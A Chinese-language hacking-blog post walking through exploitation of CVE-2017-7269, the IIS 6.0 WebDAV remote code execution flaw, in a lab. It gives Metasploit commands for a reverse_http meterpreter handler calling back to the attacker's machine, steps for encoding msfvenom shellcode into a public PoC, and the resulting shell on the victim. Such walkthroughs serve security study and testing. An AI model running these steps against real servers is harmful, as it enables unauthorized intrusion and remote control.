记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

(CVE-2017-7269)iis6远程代码执行漏洞详细分析

2017-04-04 04:55

作者:墨魂

poc:https://www.exploit-db.com/exploits/41738/

//我们博客之前发的有http://www.0-sec.org/2017/03/28/cve-2017-7269iis6远程代码执行漏洞/

 

利用条件是目标iis6.0 并且开启了webdav

我们测试的目标是:192.168.2.137

 

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

这样说明是可以利用的

kali的ip是:192.168.2.131

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

msf > use exploit/multi/handler

msf>exploit(handler)  > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf exploit(handler) > show options

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

msf exploit(handler) > set LHOST 192.168.2.131

LHOST => 192.168.2.131

msf exploit(handler) > set LPORT 4455

LPORT => 4455

msf exploit(handler) > exploit -j

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

然后对shellcode进行编码,并更改poc中的shellcode

 

复制刚刚用msfvenom命令所生产的shellcode

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

就是修改poc中的shellcode编码,将其替换, 保存的文件名就叫encode.c

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

root@mohun:~# gcc -o encode encode.c

root@mohun:~#ls

root@mohun:~#./encode --help

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

root@mohun:~#./encode --upercase --unicode ESI

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

将其复制下来,保存到poc中的shellcode。  其文件名为iis.py

root@mohun:~#python iis.py

 

中间总结一下,那么我们接下来的界面就是这样。

左边图是运行的msf,中间是iis.py , 右边是运行的msfvenom,

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

终端中执行 jobs

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

msf exploit(handler) > sessions -l

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

msf exploit(handler) >sessions -i 1

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

msterpreter > getid

server username :NT AUTHORITY\NETWORD SERVICE

meterpreter >shell

Process 2328 created.

Channel 1 created.

whoami

whoami

nt authority\network service

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

c:\windows\system32\inetsrv>ipconfig   

//我们可以看192.168.2.137是被入侵的ip

(CVE-2017-7269)iis6远程代码执行漏洞详细分析-Web安全

 

累死了,漏洞具体内容大概就是这个样子。

/*

丁酉年 【鸡年】癸卯月 庚申日

2017.4.3

by:ian 总结

*/

知识来源: www.0-sec.org/2017/04/03/cve-2017-7269iis6%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e8%af%a6%e7%bb%86%e5%88%86%e6%9e%90/

阅读:596284 | 评论:0 | 标签:Exp分享 安全文章 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“(CVE-2017-7269)iis6远程代码执行漏洞详细分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云